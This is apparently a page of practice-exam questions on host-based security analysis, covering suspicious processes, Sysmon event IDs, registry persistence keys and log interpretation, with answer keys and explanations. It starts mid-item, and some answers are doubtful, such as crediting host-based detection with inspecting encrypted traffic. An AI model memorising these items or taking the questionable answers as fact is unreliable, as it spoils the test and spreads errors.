How to eliminate wrong answers

Option A is wrong because a Windows Service requires installation via `sc create` or the Service Control Manager, and the JSON shows no `ImagePath` under `SYSTEM\CurrentControlSet\Services` or `Start` type values; a Run key is not a service. Option B is wrong because the Startup Folder uses a shortcut file in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup`, not a registry key; the JSON explicitly references a registry path. Option D is wrong because a Scheduled Task is defined in `\Windows\System32\Tasks` or via `schtasks.exe` with XML triggers, not a simple registry value under `Run`; the JSON lacks task-specific fields like `Triggers` or `Actions`.

26
Drag & Dropmedium

Drag and drop the steps to configure a Cisco ASA firewall for basic network access into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

ASA config: global config, set interfaces, create ACL, apply ACL, verify.

27
MCQeasy

Refer to the exhibit. An analyst runs tasklist /SVC on a suspected host. Which process is most suspicious?

A.svchost.exe with PID 1500
B.svchost.exe with PID 1240
C.notmalware.exe with PID 2300
D.svchost.exe with PID 1780
AnswerC

Unusual name and no services; likely malware disguised.

Why this answer

Option C is correct because 'notmalware.exe' is a deliberately suspicious process name that does not correspond to any legitimate Windows system binary. The tasklist /SVC command displays processes and their associated services; a process named 'notmalware.exe' is a clear indicator of potential malware attempting to disguise itself with an ironic name, whereas svchost.exe is a legitimate Windows host process for services.

Exam trap

Cisco often tests the misconception that multiple svchost.exe processes are inherently suspicious, when in fact Windows normally runs many svchost instances, and the real red flag is a process with a clearly fabricated name like 'notmalware.exe'.

How to eliminate wrong answers

Option A is wrong because svchost.exe with PID 1500 is a legitimate Windows system process that hosts multiple services; its presence alone is not suspicious without additional indicators like unusual parent process or high resource usage. Option B is wrong because svchost.exe with PID 1240 is also a normal svchost instance; multiple svchost.exe processes are expected in Windows as each hosts one or more services. Option D is wrong because svchost.exe with PID 1780 is another legitimate svchost instance; the tasklist /SVC output shows these are associated with standard services, making them not inherently suspicious.

28
MCQmedium

Refer to the exhibit. A network analyst sees repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23. Based on the log, what type of activity is most likely occurring?

A.DNS amplification attack
B.ARP spoofing
C.Brute force attempt on Telnet service
D.ICMP flood attack
AnswerC

Multiple connection attempts to port 23 (Telnet) from the same source indicate a brute force or scanning activity.

Why this answer

The log shows repeated denied attempts from host 10.0.0.2 to 10.0.0.1 on port 23, which is the default port for Telnet. Multiple failed connection attempts to a Telnet service indicate a brute force attack, where an attacker tries to guess credentials by repeatedly attempting to log in.

Exam trap

Cisco often tests the association of default port numbers with services (port 23 = Telnet) and expects candidates to recognize that repeated connection attempts to a login service indicate a brute force attack, not a flood or spoofing attack.

How to eliminate wrong answers

Option A is wrong because a DNS amplification attack uses spoofed source IPs to send small queries to open DNS resolvers, causing large responses to flood a victim; it does not involve repeated direct connections to port 23. Option B is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with a legitimate IP, enabling man-in-the-middle attacks, not repeated Telnet login attempts. Option D is wrong because an ICMP flood attack overwhelms a target with ICMP echo request packets (ping floods), not with TCP connection attempts to port 23.

29
MCQhard

An analyst is reviewing Sysmon logs from a compromised host. They see Event ID 1 (Process creation) for cmd.exe with parent process winword.exe. What does this indicate?

A.The Windows Update service initiated cmd from Word
B.The user launched cmd.exe manually from within Word using a shortcut
C.Word crashed and created a dump file using cmd
D.A macro in a Word document executed cmd.exe as part of the attack
AnswerD

Common technique: macro calls cmd to download or execute payload.

Why this answer

Event ID 1 (Process creation) with parent process winword.exe spawning cmd.exe is a classic indicator of a macro-based attack. Microsoft Word is not designed to launch command-line interpreters under normal operation; when cmd.exe appears as a child of winword.exe, it strongly suggests that a malicious macro within the document executed a shell command, often to download payloads, escalate privileges, or perform reconnaissance. This aligns with common phishing and malware delivery techniques where attackers embed VBA macros to execute system commands.

Exam trap

Cisco often tests the distinction between normal application behavior and process injection or parent-child anomalies; the trap here is assuming that any cmd.exe launch is benign or user-initiated, when the parent process (winword.exe) is the key indicator of macro-based compromise.

How to eliminate wrong answers

Option A is wrong because Windows Update runs as a system service (svchost.exe or trustedinstaller.exe), not as a child of winword.exe; there is no mechanism for Windows Update to initiate cmd.exe from Word. Option B is wrong because manually launching cmd.exe from within Word via a shortcut would still show the parent process as explorer.exe or the user's shell, not winword.exe; Word does not become the parent process for user-initiated commands outside its own UI. Option C is wrong because Word crash dumps are typically created by Windows Error Reporting (WerFault.exe) or the process itself, not by spawning cmd.exe; a crash dump does not involve launching a command shell.

30
Multi-Selecteasy

Which TWO host-based analysis techniques are most effective for detecting fileless malware?

Select 2 answers
A.Process memory analysis to detect injected code
B.Network traffic analysis
C.Signature-based file scanning
D.Registry analysis for persistence
E.PowerShell script block logging
AnswersA, E

Fileless malware often injects code into memory.

Why this answer

Process memory analysis (A) is effective because fileless malware resides in memory without writing to disk, so examining running processes for injected code, suspicious memory regions, or anomalous API calls can directly detect the malicious payload. PowerShell script block logging (E) captures the full text of PowerShell commands executed, including obfuscated or encoded scripts that fileless malware often uses to load payloads directly into memory, making it a powerful host-based detection technique.

Exam trap

Cisco often tests the distinction between host-based and network-based analysis techniques, and the trap here is that candidates may select network traffic analysis (B) because it can detect fileless malware's network activity, but the question specifically asks for host-based techniques, making B incorrect.

31
Multi-Selectmedium

Which THREE indicators in Windows Event Log are most commonly associated with a successful compromise?

Select 3 answers
A.Event ID 4740: A user account was locked out
B.Event ID 4720: A user account was created
C.Event ID 7045: A service was installed in the system
D.Event ID 4624: An account was successfully logged on
E.Event ID 5156: The Windows Filtering Platform allowed a connection
AnswersB, C, D

Creation of new accounts by attacker for persistence.

Why this answer

Event ID 4720 indicates a new user account was created, which is a common post-compromise action where an attacker establishes persistence by adding a backdoor account. Event ID 7045 logs when a new service is installed, often used by malware or attackers to maintain persistence or execute code with system privileges. Event ID 4624 records successful logon events, which after a compromise may show anomalous logons (e.g., from unexpected IPs, off-hours, or using compromised credentials).

Exam trap

Cisco often tests the distinction between events that indicate a successful compromise (e.g., account creation, service installation, successful logon) versus events that indicate failed attempts or normal operations, leading candidates to mistakenly select lockout or firewall allow events as compromise indicators.

32
MCQhard

An analyst is performing host-based analysis on a machine that is part of a botnet. The machine is communicating with a C2 server over HTTPS. Which host-based evidence would be most useful to identify the C2 communication?

A.Packet capture showing the unencrypted payload
B.A memory dump of the process showing encryption keys
C.DNS logs showing queries to the C2 domain
D.Windows Event ID 5157 (Filtering Platform connection) showing the process ID
AnswerC

DNS queries often precede HTTPS connections. The domain may be unique or malicious.

Why this answer

Option C is correct because DNS logs can reveal the domain name used for C2 communication even when the traffic is encrypted over HTTPS. Since the analyst is performing host-based analysis, DNS query logs on the host itself (e.g., from the DNS client service or a local DNS resolver) will show the host attempting to resolve the C2 domain, providing a direct indicator of the C2 server's address without needing to decrypt the HTTPS traffic.

Exam trap

Cisco often tests the misconception that encrypted traffic cannot be analyzed at all, leading candidates to choose options like packet capture or memory dumps, when in fact DNS logs provide a clear, host-based indicator of C2 communication without requiring decryption.

How to eliminate wrong answers

Option A is wrong because HTTPS traffic is encrypted, so a packet capture on the host would not show the unencrypted payload; the analyst would need to decrypt the session, which is not feasible without the private key or a man-in-the-middle proxy. Option B is wrong because while a memory dump might contain encryption keys if the process stores them in plaintext, this is not a reliable or standard method for identifying C2 communication; it requires deep forensic analysis and the keys may not be present or easily extractable. Option D is wrong because Windows Event ID 5157 (Filtering Platform connection) logs the process ID and connection details, but it does not include the domain name or URL; it only shows IP addresses and ports, which may not directly identify the C2 server if it uses dynamic IPs or CDN fronting.

33
MCQeasy

A security analyst is analyzing a memory dump from a compromised Linux server. Which tool is most appropriate for extracting running processes and network connections from the dump?

A.volatility
B.nmap
C.Wireshark
D.tcpdump
AnswerA

Volatility can analyze memory dumps to extract process and network information.

Why this answer

Volatility is the correct tool because it is a specialized memory forensics framework designed to analyze RAM dumps. It can extract a list of running processes (via the `pslist` or `pstree` plugins) and active network connections (via the `netscan` or `connscan` plugins) directly from the memory image, without relying on the live system's kernel data structures which may be compromised.

Exam trap

Cisco often tests the distinction between live network analysis tools (nmap, Wireshark, tcpdump) and memory forensics tools (Volatility), expecting candidates to recognize that only Volatility can extract process and connection artifacts from a static memory dump.

How to eliminate wrong answers

Option B (nmap) is wrong because it is a network scanning tool used to discover hosts and services on a live network, not for analyzing a static memory dump. Option C (Wireshark) is wrong because it captures and analyzes live network traffic from a network interface, not from a memory dump file. Option D (tcpdump) is wrong because it is a command-line packet analyzer that captures live network packets, and it cannot parse a memory dump to extract processes or connections.

34
MCQeasy

A security analyst notices that a workstation is generating multiple DNS queries to a known malicious domain. Which host-based analysis technique would be most effective in confirming the infection?

A.Review the Windows Firewall logs to see blocked connections
B.Check the scheduled tasks for suspicious entries
C.Use Process Explorer to examine the process responsible for the DNS queries
D.Analyze the Windows Event Log for Event ID 5156
AnswerC

Process Explorer can show network activity per process, directly linking the DNS queries to a specific executable.

Why this answer

Process Explorer is a host-based analysis tool that provides detailed information about running processes, including their network connections and DNS queries. By examining the process responsible for the DNS queries to the known malicious domain, the analyst can directly identify the infected executable or script, confirming the infection at the process level.

Exam trap

Cisco often tests the distinction between host-based analysis tools (like Process Explorer) and log-based analysis (like firewall or event logs), trapping candidates who choose a log-based option when a process-level tool is needed to confirm the infection source.

How to eliminate wrong answers

Option A is wrong because Windows Firewall logs only show blocked connections, but the DNS queries are likely succeeding (generating traffic), so blocked connections would not capture the malicious activity. Option B is wrong because scheduled tasks are a persistence mechanism, not the immediate source of active DNS queries; the infection may not rely on scheduled tasks. Option D is wrong because Event ID 5156 logs successful outbound connections, but it does not link the connection to a specific process or DNS query, making it less effective for pinpointing the responsible process.

35
MCQeasy

Which Windows registry hive is most likely to contain evidence of malware persistence via a service?

A.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
C.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
D.HKEY_LOCAL_MACHINE\SAM
AnswerB

This hive stores service configurations, including the path to the executable.

Why this answer

The HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services registry hive stores the configuration for all Windows services, including their executable paths and startup types. Malware often installs itself as a service to achieve persistence, and evidence of this can be found by examining the ImagePath value under a suspicious service subkey. This is the correct location for service-based persistence, unlike the Run keys which handle startup programs for users.

Exam trap

Cisco often tests the distinction between Run keys (user logon persistence) and Services keys (system service persistence), and the trap here is that candidates confuse the Run keys with service persistence because both are common persistence mechanisms, but only the Services hive stores service-specific configurations.

How to eliminate wrong answers

Option A is wrong because HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is used for auto-starting programs at user logon, not for services; malware using this key persists via Run registry entries, not as a service. Option C is wrong because HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run is a per-user Run key that only affects the currently logged-in user, not system-wide service persistence. Option D is wrong because HKEY_LOCAL_MACHINE\SAM stores Security Account Manager data (user and group hashes) and is not related to service configuration or persistence mechanisms.

36
Multi-Selecthard

An analyst is investigating a host that is suspected of being compromised. The host's security logs show multiple failed login attempts followed by a successful login from an unusual IP address, and then a series of outbound connections to known malicious destinations. Which TWO actions should the analyst take immediately? (Choose two.)

Select 2 answers
A.Delete the malicious files found on the host
B.Isolate the host from the network
C.Collect a forensic image of the host's hard drive
D.Reboot the host to clear any malware from memory
E.Run a full antivirus scan on the host
AnswersB, C

Isolating the host stops ongoing malicious activity and prevents lateral movement.

Why this answer

Option B is correct because isolating the host from the network immediately stops the outbound connections to known malicious destinations, preventing further data exfiltration, lateral movement, or command-and-control (C2) communication. This containment step is critical in incident response to limit the blast radius before any other investigative or remediation actions are taken.

Exam trap

Cisco often tests the misconception that immediate remediation (deleting files, running antivirus) is the priority, when in fact containment (isolation) and evidence preservation (forensic imaging) are the correct first steps in a structured incident response process.

37
MCQmedium

During a host-based investigation, an analyst finds a process named 'svchost.exe' consuming high CPU. The process path is 'C:\Windows\Temp\svchost.exe'. What should the analyst conclude?

A.It is a legitimate Windows service host process
B.It is a third-party application that requires investigation
C.It is likely malware disguised as a legitimate process
D.It is a temporary file created by Windows Update
AnswerC

Malware often uses common names in non-standard locations to evade detection.

Why this answer

The legitimate svchost.exe (Service Host) runs from C:\Windows\System32, not C:\Windows\Temp. The Temp directory is a common location for malware to masquerade as system processes to evade detection. High CPU usage combined with an anomalous path strongly indicates malicious activity, as legitimate svchost.exe instances are signed by Microsoft and reside in System32.

Exam trap

Cisco often tests the misconception that any process named 'svchost.exe' is automatically legitimate, but the trap here is that the file path is the critical differentiator—malware frequently uses the same name as a trusted system binary but runs from an unauthorized location.

How to eliminate wrong answers

Option A is wrong because the legitimate svchost.exe is located in C:\Windows\System32, not C:\Windows\Temp; any svchost.exe outside System32 is not a genuine Windows service host. Option B is wrong because while third-party applications can run from Temp, the name 'svchost.exe' is specifically chosen to impersonate a Windows system process, making it far more likely to be malware than a benign third-party app. Option D is wrong because Windows Update does not create svchost.exe in the Temp directory; it uses trusted binaries in System32 and may create temporary files with different names (e.g., .tmp) in C:\Windows\Temp.

38
MCQmedium

Refer to the exhibit. A host-based analyst reviews auth.log. What does the accepted password log entry indicate?

A.The root account was successfully compromised
B.The system prevented a brute-force attack on the admin account
C.The admin login is legitimate because it was accepted
D.The admin account was accessed by an attacker after brute-forcing root
AnswerD

The IP tried root multiple times, then succeeded with admin, likely guessing the password.

Why this answer

The log entry shows 'Accepted password for admin from 10.10.10.10 port 22 ssh2' followed by 'Failed password for root from 10.10.10.10 port 22 ssh2'. The sequence indicates that the attacker first successfully logged in as 'admin' (accepted password), then attempted to escalate privileges by brute-forcing the 'root' account. Option D correctly identifies that the admin account was accessed by an attacker who then attempted to brute-force root, as evidenced by the failed root attempts after a successful admin login.

Exam trap

Cisco often tests the trap that 'Accepted password' automatically implies a legitimate user, but in host-based analysis, the context of subsequent failed attempts reveals malicious intent, so candidates must correlate multiple log entries rather than evaluating them in isolation.

How to eliminate wrong answers

Option A is wrong because the log shows 'Failed password for root', meaning the root account was not compromised—only an attempt was made. Option B is wrong because the system did not prevent a brute-force attack on the admin account; in fact, the admin login was accepted, indicating a successful authentication, not a prevention. Option C is wrong because the admin login being 'accepted' does not automatically make it legitimate—it could be an attacker using a valid credential, and the subsequent failed root attempts suggest malicious intent.

39
MCQmedium

An analyst needs to collect volatile data from a live host before performing a memory dump. Which data is most volatile?

A.Registry data
B.Network connections
C.File system metadata
D.Event logs
AnswerB

Network state changes with every packet, making it highly volatile.

Why this answer

Network connections are the most volatile data because they change rapidly as packets flow and sessions are established or torn down. In live response, the current state of TCP/UDP connections (e.g., via netstat -ano) can be lost the instant the system is powered off or the network cable is pulled, making them more ephemeral than registry data, file system metadata, or event logs.

Exam trap

Cisco often tests the order of volatility (RFC 3227) by making candidates confuse persistent disk-based data (registry, logs, file metadata) with transient memory-based data, so the trap is assuming that any system artifact is equally volatile when network state is actually the most ephemeral.

How to eliminate wrong answers

Option A is wrong because registry data persists on disk and changes only when software is installed, configured, or uninstalled, making it less volatile than active network connections. Option C is wrong because file system metadata (e.g., timestamps, permissions) is stored on disk and remains relatively stable until files are explicitly modified, so it is not as transient as network state. Option D is wrong because event logs are written to disk and persist across reboots, so they are far less volatile than live network connection tables.

40
Multi-Selecthard

An analyst is examining the Windows Registry on a host suspected of persistence via a malicious service. Which two registry keys are most relevant to investigate?

Select 2 answers
A.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
B.HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
C.HKEY_CLASSES_ROOT\exefile\shell\open\command
D.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
E.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
AnswersA, D

This key lists all system services.

Why this answer

Option A is correct because the Services key under CurrentControlSet lists all registered Windows services, including their executable paths and startup types. Malicious services often register here to achieve persistence by starting automatically with the system. Examining this key allows an analyst to identify suspicious service names, image paths, or startup configurations that indicate persistence.

Exam trap

Cisco often tests the distinction between service persistence (Services key) and other autorun mechanisms (Run, RunOnce, AppInit_DLLs), so candidates may confuse the Services key with the Run key or other startup locations.

41
MCQmedium

A security analyst is investigating a host that is suspected of being used as a pivot point in a network intrusion. The analyst needs to identify which process initiated an outbound connection to a known malicious IP address. Which host-based analysis approach should the analyst use to correlate the network connection to the specific process?

A.Run 'netstat -b' on the Windows host to display active connections with the associated process executable.
B.Examine the Windows Firewall log to see the source and destination IP addresses and ports for outbound traffic.
C.Review Windows Security Event Log for Event ID 4688 (Process Creation) for the timeline of process starts.
D.Use PowerShell cmdlet 'Get-NetTCPConnection' to list current TCP connections and their states.
AnswerA

The -b flag shows the binary involved in creating each connection, directly correlating the connection to the process.

Why this answer

Running 'netstat -b' on a Windows host displays active TCP connections along with the executable name of the process that created each connection. This directly correlates the outbound connection to the malicious IP with the specific process, which is exactly what the analyst needs to identify the pivot point.

Exam trap

Cisco often tests the distinction between network-level logs (firewall logs) and host-level process-to-connection correlation, and the trap here is that candidates may choose 'Get-NetTCPConnection' (Option D) because it lists connections, but they overlook that it does not show the associated process executable without additional scripting.

How to eliminate wrong answers

Option B is wrong because the Windows Firewall log records source/destination IPs and ports but does not associate traffic with a specific process executable; it only logs network-level metadata. Option C is wrong because Event ID 4688 logs process creation events but does not include network connection details, so it cannot correlate a specific outbound connection to a process. Option D is wrong because 'Get-NetTCPConnection' lists TCP connections and their states but does not show the associated process executable; it lacks the -b flag's process-to-connection mapping.

42
MCQmedium

An analyst is examining a Linux host suspected of being compromised. The file /etc/passwd shows unusual entries. Which host-based analysis tool is best for verifying if the accounts are actively being used?

A.lsof tool
B.ps aux command
C.last command output
D.auditd logs
AnswerC

last reads /var/log/wtmp and shows login sessions, indicating active use.

Why this answer

The `last` command reads the /var/log/wtmp file to display a list of all users who have logged in and out, including their login times and durations. Since the question asks whether suspicious accounts from /etc/passwd are actively being used, `last` directly shows recent login activity, making it the best tool for verification.

Exam trap

Cisco often tests the distinction between tools that show current state (like `ps` or `lsof`) versus tools that show historical activity (like `last`), trapping candidates who confuse 'active processes' with 'active user accounts'.

How to eliminate wrong answers

Option A is wrong because `lsof` lists open files and network connections, not user login history; it cannot show whether an account has logged in. Option B is wrong because `ps aux` shows currently running processes, not historical or recent login sessions; an account could be active without a running process. Option D is wrong because `auditd` logs system calls and security events but requires pre-configured rules to track logins; it is not a simple, immediate command to check active account usage like `last`.

43
Multi-Selectmedium

A security analyst is investigating a host that may have been compromised via a drive-by download. Which three indicators of compromise should the analyst look for in the host's logs and artifacts?

Select 3 answers
A.Unusual outbound network connections
B.Modified system files in %SystemRoot%\System32
C.A new user account added to the local Administrators group
D.A large number of 404 errors in the web server log
E.Presence of a scheduled task that runs an unknown executable
AnswersA, B, E

Malware often communicates with C2 servers.

Why this answer

A drive-by download typically exploits a browser or plugin vulnerability to silently execute code on the host. Once compromised, the malware often establishes command-and-control (C2) communication, which manifests as unusual outbound network connections to suspicious IP addresses or domains on non-standard ports (e.g., TCP 4444, 8080). Analyzing netstat output or firewall logs for unexpected outbound traffic is a primary indicator of such post-exploitation activity.

Exam trap

Cisco often tests the distinction between host-based and network-based indicators, and the trap here is that candidates confuse web server logs (network-based) with host-based artifacts, or they assume that any post-exploitation action like adding an admin user is a direct indicator of the initial compromise vector rather than a later persistence step.

44
MCQhard

Refer to the exhibit. A security analyst is analyzing a Windows host that is communicating with an external server at 192.168.1.50. Based on the output, which process is likely malicious?

A.svchost.exe (PID 1420) because it is connecting to an external IP on port 80.
B.cmd.exe (PID 2568) because it could be used to launch other processes.
C.powershell.exe (PID 2792) because it has an established HTTPS connection to an external server.
D.notepad.exe (PID 2344) because it is not expecting to make any network connections.
AnswerC

PowerShell making an outbound HTTPS connection is atypical and often used for malicious purposes.

Why this answer

PowerShell.exe (PID 2792) is the likely malicious process because it has an established HTTPS connection (TCP port 443) to an external server at 192.168.1.50. PowerShell is a powerful scripting tool often abused by attackers to execute arbitrary code, download payloads, or establish command-and-control (C2) channels over encrypted HTTPS, which can evade detection by traditional signature-based security tools.

Exam trap

Cisco often tests the misconception that any process connecting to an external IP is malicious, but the trap here is that candidates overlook the context of the process—PowerShell is a legitimate tool that is frequently abused, whereas svchost.exe making HTTP connections is normal system behavior.

How to eliminate wrong answers

Option A is wrong because svchost.exe (PID 1420) connecting to an external IP on port 80 is normal behavior for Windows services that perform HTTP-based updates or telemetry; svchost.exe is a legitimate system process. Option B is wrong because cmd.exe (PID 2568) could be used to launch other processes, but the exhibit does not show any network connection or suspicious activity from cmd.exe, making it not directly indicative of malicious behavior. Option D is wrong because notepad.exe (PID 2344) is not expected to make network connections, but the exhibit does not show any network connection from notepad.exe, so there is no evidence of malicious activity from that process.

45
Multi-Selecthard

Which TWO characteristics are typical of host-based intrusion detection systems (HIDS) compared to network-based intrusion detection systems (NIDS)?

Select 2 answers
A.Better suited for protecting a large number of devices simultaneously.
B.Visibility into local system events such as file system changes and registry modifications.
C.Ability to inspect encrypted traffic at the host level.
D.Less susceptible to host-based attacks.
E.Lower latency in detecting network attacks.
AnswersB, C

HIDS monitors host-specific activities.

Why this answer

Option B is correct because HIDS are installed directly on a host and have direct access to the host's operating system, allowing them to monitor local system events such as file system changes, registry modifications, and process activity. This granular visibility is a key advantage over NIDS, which only sees network traffic and cannot inspect internal host state.

Exam trap

Cisco often tests the misconception that HIDS are better at detecting network attacks or scaling to many devices, but the key differentiator is that HIDS provide host-level visibility (like registry and file changes) and can inspect decrypted traffic, while NIDS are network-focused and cannot see internal host events.

46
Multi-Selecteasy

Which two Sysmon Event IDs are most commonly associated with code injection techniques?

Select 2 answers
A.Event ID 3 (Network connect)
B.Event ID 8 (CreateRemoteThread)
C.Event ID 1 (Process creation)
D.Event ID 7 (Image loaded)
E.Event ID 10 (ProcessAccess)
AnswersB, E

CreateRemoteThread is a common method for code injection.

Why this answer

Sysmon Event ID 8 (CreateRemoteThread) is directly associated with code injection because it logs when a thread is created in a remote process, a common technique used by malware to inject malicious code into a legitimate process. Event ID 10 (ProcessAccess) is also critical as it records when a process opens a handle to another process, often a precursor to injecting code via APIs like OpenProcess and WriteProcessMemory.

Exam trap

Cisco often tests the distinction between direct indicators of injection (Event ID 8 and 10) versus indirect artifacts (Event ID 1 or 7), leading candidates to mistakenly choose process creation or image load events as primary injection indicators.

Ready to test yourself?

Try a timed practice session using only Host-Based Analysis questions.